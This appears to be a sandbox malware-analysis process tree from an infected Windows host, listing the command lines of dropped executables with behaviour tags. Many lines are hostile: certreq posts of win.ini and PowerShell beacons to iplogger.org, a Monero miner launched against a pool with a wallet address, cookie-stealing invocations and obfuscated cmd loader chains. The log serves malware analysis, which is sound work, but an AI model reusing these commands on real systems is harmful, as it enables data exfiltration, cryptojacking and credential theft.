C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,2265873176109268348,2307714243205901773,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=4420 /prefetch:8
10⤵
PID:7936

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,2265873176109268348,2307714243205901773,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=4908 /prefetch:8
10⤵
PID:6872

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,2265873176109268348,2307714243205901773,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=4932 /prefetch:8
10⤵
PID:6440

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,2265873176109268348,2307714243205901773,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=5276 /prefetch:8
10⤵
PID:9132

C:\Users\Admin\AppData\Local\Temp\4ey1ubqdlj3\chashepro3.exe
"C:\Users\Admin\AppData\Local\Temp\4ey1ubqdlj3\chashepro3.exe" /VERYSILENT
8⤵
PID:5424

C:\Users\Admin\AppData\Local\Temp\is-65GJ6.tmp\chashepro3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-65GJ6.tmp\chashepro3.tmp" /SL5="$D0A28,2012497,58368,C:\Users\Admin\AppData\Local\Temp\4ey1ubqdlj3\chashepro3.exe" /VERYSILENT
9⤵
PID:9892

C:\Program Files (x86)\JCleaner\8.exe
"C:\Program Files (x86)\JCleaner\8.exe"
10⤵
PID:7900

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c echo grYNxrw
11⤵
PID:7080

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Nemica.sys
11⤵
PID:8468

C:\Windows\SysWOW64\cmd.exe
cmd
12⤵
PID:1936

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1EaGq7"
10⤵
PID:1972

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c "start https://iplogger.org/1EaGq7"
10⤵
PID:10940

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c certreq -post -config https://iplogger.org/1EaGq7 %windir%\\win.ini %temp%\\2 & del %temp%\\2
10⤵
PID:5152

C:\Windows\SysWOW64\certreq.exe
certreq -post -config https://iplogger.org/1EaGq7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\2
11⤵
PID:5344

C:\Program Files (x86)\JCleaner\Venita.exe
"C:\Program Files (x86)\JCleaner\Venita.exe"
10⤵
PID:8228

C:\Program Files (x86)\JCleaner\Venita.exe
"{path}"
11⤵
PID:10664

C:\Program Files (x86)\JCleaner\Brava.exe
"C:\Program Files (x86)\JCleaner\Brava.exe"
10⤵
PID:5372

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1aSny7"
10⤵
PID:8720

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c "start https://iplogger.org/1aSny7"
10⤵
PID:8788

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c certreq -post -config https://iplogger.org/1aSny7 %windir%\\win.ini %temp%\\2 & del %temp%\\2
10⤵
PID:5368

C:\Windows\SysWOW64\certreq.exe
certreq -post -config https://iplogger.org/1aSny7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\2
11⤵
PID:9472

C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"
4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:4820

C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2632

C:\Users\Admin\AppData\Roaming\D3EF.tmp.exe
"C:\Users\Admin\AppData\Roaming\D3EF.tmp.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4456

C:\Users\Admin\AppData\Roaming\D3EF.tmp.exe
"C:\Users\Admin\AppData\Roaming\D3EF.tmp.exe"
6⤵
- Executes dropped EXE
- Checks processor information in registry
PID:4188

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
5⤵
PID:4872

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
6⤵
- Runs ping.exe
PID:5376

C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"
4⤵
- Executes dropped EXE
PID:4836

C:\ProgramData\890310.9
"C:\ProgramData\890310.9"
5⤵
- Executes dropped EXE
PID:4684

C:\ProgramData\6844724.75
"C:\ProgramData\6844724.75"
5⤵
- Executes dropped EXE
- Adds Run key to start application
PID:5164

C:\ProgramData\Windows Host\Windows Host.exe
"C:\ProgramData\Windows Host\Windows Host.exe"
6⤵
- Executes dropped EXE
PID:6012

C:\ProgramData\3931600.43
"C:\ProgramData\3931600.43"
5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Drops startup file
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5308

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
6⤵
- Executes dropped EXE
PID:6488

C:\ProgramData\3901899.42
"C:\ProgramData\3901899.42"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4264

C:\ProgramData\3901899.42
"{path}"
6⤵
PID:5460

C:\ProgramData\8384548.92
"C:\ProgramData\8384548.92"
5⤵
- Executes dropped EXE
PID:4976

C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"
4⤵
- Executes dropped EXE
- Adds Run key to start application
PID:748

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
- Executes dropped EXE
PID:5784

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
- Executes dropped EXE
PID:6540

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
PID:5452

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
PID:8352

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:208

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 4B0BFCA977AF02BC26D4750D1FEFD319 C
2⤵
- Loads dropped DLL
PID:2084

C:\Users\Admin\AppData\Local\Temp\is-OLVEK.tmp\chashepro3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-OLVEK.tmp\chashepro3.tmp" /SL5="$2020C,2012497,58368,C:\Users\Admin\AppData\Local\Temp\ooordyxwgzh\chashepro3.exe" /VERYSILENT
1⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:5064

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c certreq -post -config https://iplogger.org/1aSny7 %windir%\\win.ini %temp%\\2 & del %temp%\\2
2⤵
PID:4464

C:\Windows\SysWOW64\certreq.exe
certreq -post -config https://iplogger.org/1aSny7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\2
3⤵
PID:5432

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c "start https://iplogger.org/1aSny7"
2⤵
- Checks computer location settings
PID:4396

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1aSny7"
2⤵
- Blocklisted process makes network request
- Drops file in System32 directory
PID:4372

C:\Program Files (x86)\JCleaner\Brava.exe
"C:\Program Files (x86)\JCleaner\Brava.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1580

C:\Program Files (x86)\JCleaner\Venita.exe
"C:\Program Files (x86)\JCleaner\Venita.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4108

C:\Program Files (x86)\JCleaner\Venita.exe
"{path}"
3⤵
PID:6520

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c certreq -post -config https://iplogger.org/1EaGq7 %windir%\\win.ini %temp%\\2 & del %temp%\\2
2⤵
PID:4076

C:\Windows\SysWOW64\certreq.exe
certreq -post -config https://iplogger.org/1EaGq7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\2
3⤵
PID:5556

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c "start https://iplogger.org/1EaGq7"
2⤵
- Checks computer location settings
PID:4980

C:\Program Files (x86)\JCleaner\8.exe
"C:\Program Files (x86)\JCleaner\8.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4256

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Nemica.sys
3⤵
PID:5060

C:\Windows\SysWOW64\cmd.exe
cmd
4⤵
PID:5640

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^PjMCYRVvFiGYRZCsTsllRymwdfLpHzjkTlyvJeXJBvVpnBIRpeOsWfRKMKjJuLOkUcyGUyIRzAIxpdCOHTqEEVgDaxJYPgDPHJgevwWrxWXvGvAcibwjLpHZiBgmcK$" Acre.wmz
5⤵
PID:7784

C:\Users\Admin\AppData\Local\Temp\koIijIMhEUjPv\Fai.com
Fai.com Far.xlt
5⤵
- Suspicious use of SetWindowsHookEx
PID:5316

C:\Users\Admin\AppData\Local\Temp\koIijIMhEUjPv\Fai.com
C:\Users\Admin\AppData\Local\Temp\koIijIMhEUjPv\Fai.com Far.xlt
6⤵
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:4232

C:\Users\Admin\AppData\Local\Temp\koIijIMhEUjPv\Fai.com
C:\Users\Admin\AppData\Local\Temp\koIijIMhEUjPv\Fai.com
7⤵
PID:5328

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C ver > "C:\Users\Admin\AppData\Local\Temp\chrF491.tmp"
8⤵
PID:2036

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C wmic process get Name > "C:\Users\Admin\AppData\Local\Temp\chrFF7F.tmp"
8⤵
PID:4240

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process get Name
9⤵
PID:7028

C:\Windows\SysWOW64\cmd.exe
cmd /c makecab /V3 "C:\Users\Admin\AppData\Local\Temp\1e421401077a6472c621a55c2c9b0ae7fe2a38a1" "C:\Users\Admin\AppData\Local\Temp\chr313E.tmp"
8⤵
PID:5880

C:\Windows\SysWOW64\makecab.exe
makecab /V3 "C:\Users\Admin\AppData\Local\Temp\1e421401077a6472c621a55c2c9b0ae7fe2a38a1" "C:\Users\Admin\AppData\Local\Temp\chr313E.tmp"
9⤵
PID:2524

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 30
5⤵
- Runs ping.exe
PID:7872

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1EaGq7"
2⤵
- Blocklisted process makes network request
- Drops file in System32 directory
PID:4916

C:\Users\Admin\AppData\Local\Temp\is-4M1E3.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-4M1E3.tmp\vict.tmp" /SL5="$201F8,870426,780800,C:\Users\Admin\AppData\Local\Temp\00meux1beua\vict.exe" /VERYSILENT /id=535
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:5004

C:\Users\Admin\AppData\Local\Temp\is-EI3GA.tmp\wimapi.exe
"C:\Users\Admin\AppData\Local\Temp\is-EI3GA.tmp\wimapi.exe" 535
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4852

C:\Users\Admin\AppData\Local\Temp\is-46U9D.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-46U9D.tmp\Setup3310.tmp" /SL5="$60030,802346,56832,C:\Users\Admin\AppData\Local\Temp\k4jajlvqpyu\Setup3310.exe" /Verysilent /subid=577
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4992

C:\Users\Admin\AppData\Local\Temp\is-9VI37.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-9VI37.tmp\Setup.exe" /Verysilent
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5548

C:\Users\Admin\AppData\Local\Temp\is-MDM09.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-MDM09.tmp\Setup.tmp" /SL5="$40298,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-9VI37.tmp\Setup.exe" /Verysilent
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:5672

C:\Users\Admin\AppData\Local\Temp\is-20TBG.tmp\ProPlugin.exe
"C:\Users\Admin\AppData\Local\Temp\is-20TBG.tmp\ProPlugin.exe" /Verysilent
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6268

C:\Users\Admin\AppData\Local\Temp\is-T605M.tmp\ProPlugin.tmp
"C:\Users\Admin\AppData\Local\Temp\is-T605M.tmp\ProPlugin.tmp" /SL5="$104FC,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-20TBG.tmp\ProPlugin.exe" /Verysilent
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:6324

C:\Users\Admin\AppData\Local\Temp\is-2OQNB.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-2OQNB.tmp\Setup.exe"
6⤵
- Suspicious use of SetWindowsHookEx
PID:6464

C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"
7⤵
PID:6632

C:\Windows\regedit.exe
regedit /s chrome.reg
8⤵
- Runs .reg file with regedit
PID:5144

C:\Windows\SYSTEM32\TASKKILL.exe
TASKKILL /F /IM chrome.exe
8⤵
- Kills process with taskkill
PID:6544

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c chrome64.bat
8⤵
PID:7120

C:\Windows\system32\mshta.exe
mshta vbscript:createobject("wscript.shell").run("chrome64.bat h",0)(window.close)
9⤵
PID:4756

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX1\chrome64.bat" h"
10⤵
PID:4380

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe"
11⤵
PID:6128

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd8,0xdc,0xe0,0xb4,0xe4,0x7ffb529f6e00,0x7ffb529f6e10,0x7ffb529f6e20
12⤵
PID:7132

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1776,5246059758464199734,15131981063010748122,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1788 /prefetch:2
12⤵
PID:5792

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1776,5246059758464199734,15131981063010748122,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1836 /prefetch:8
12⤵
PID:7120

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1776,5246059758464199734,15131981063010748122,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2656 /prefetch:1
12⤵
PID:7064

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1776,5246059758464199734,15131981063010748122,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2648 /prefetch:1
12⤵
PID:4452

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1776,5246059758464199734,15131981063010748122,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
12⤵
PID:6064

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1776,5246059758464199734,15131981063010748122,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3744 /prefetch:1
12⤵
PID:5544

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1776,5246059758464199734,15131981063010748122,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3608 /prefetch:1
12⤵
PID:5368

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1776,5246059758464199734,15131981063010748122,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:1
12⤵
PID:2296

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,5246059758464199734,15131981063010748122,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4156 /prefetch:8
12⤵
PID:4200

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,5246059758464199734,15131981063010748122,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3996 /prefetch:8
12⤵
PID:6024

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,5246059758464199734,15131981063010748122,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4576 /prefetch:8
12⤵
PID:7764

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,5246059758464199734,15131981063010748122,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4556 /prefetch:8
12⤵
PID:7756

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1776,5246059758464199734,15131981063010748122,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5376 /prefetch:8
12⤵
PID:7908

C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe
"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --force-configure-user-settings
12⤵
PID:1104

C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe
"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff7147e7740,0x7ff7147e7750,0x7ff7147e7760
13⤵
PID:7192

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,5246059758464199734,15131981063010748122,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4768 /prefetch:8
12⤵
PID:5152

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1776,5246059758464199734,15131981063010748122,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4196 /prefetch:8
12⤵
PID:4280

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,5246059758464199734,15131981063010748122,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4764 /prefetch:8
12⤵
PID:7384

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,5246059758464199734,15131981063010748122,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4208 /prefetch:8
12⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:6632

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,5246059758464199734,15131981063010748122,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5192 /prefetch:8
12⤵
PID:2640

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,5246059758464199734,15131981063010748122,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1764 /prefetch:8
12⤵
PID:7696

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,5246059758464199734,15131981063010748122,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1336 /prefetch:8
12⤵
PID:6564

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,5246059758464199734,15131981063010748122,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4252 /prefetch:8
12⤵
PID:7728

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,5246059758464199734,15131981063010748122,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4124 /prefetch:8
12⤵
PID:7804

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,5246059758464199734,15131981063010748122,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4376 /prefetch:8
12⤵
PID:7048

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,5246059758464199734,15131981063010748122,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3620 /prefetch:8
12⤵
PID:7924

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
13⤵
PID:6532

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,5246059758464199734,15131981063010748122,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3608 /prefetch:8
12⤵
PID:7828

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,5246059758464199734,15131981063010748122,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3904 /prefetch:8
12⤵
PID:5992

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,5246059758464199734,15131981063010748122,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3776 /prefetch:8
12⤵
PID:6996

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,5246059758464199734,15131981063010748122,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5708 /prefetch:8
12⤵
PID:8016

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,5246059758464199734,15131981063010748122,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3424 /prefetch:8
12⤵
PID:8100

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,5246059758464199734,15131981063010748122,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3392 /prefetch:8
12⤵
PID:8132

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1776,5246059758464199734,15131981063010748122,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5328 /prefetch:8
12⤵
PID:7172

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,5246059758464199734,15131981063010748122,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3512 /prefetch:8
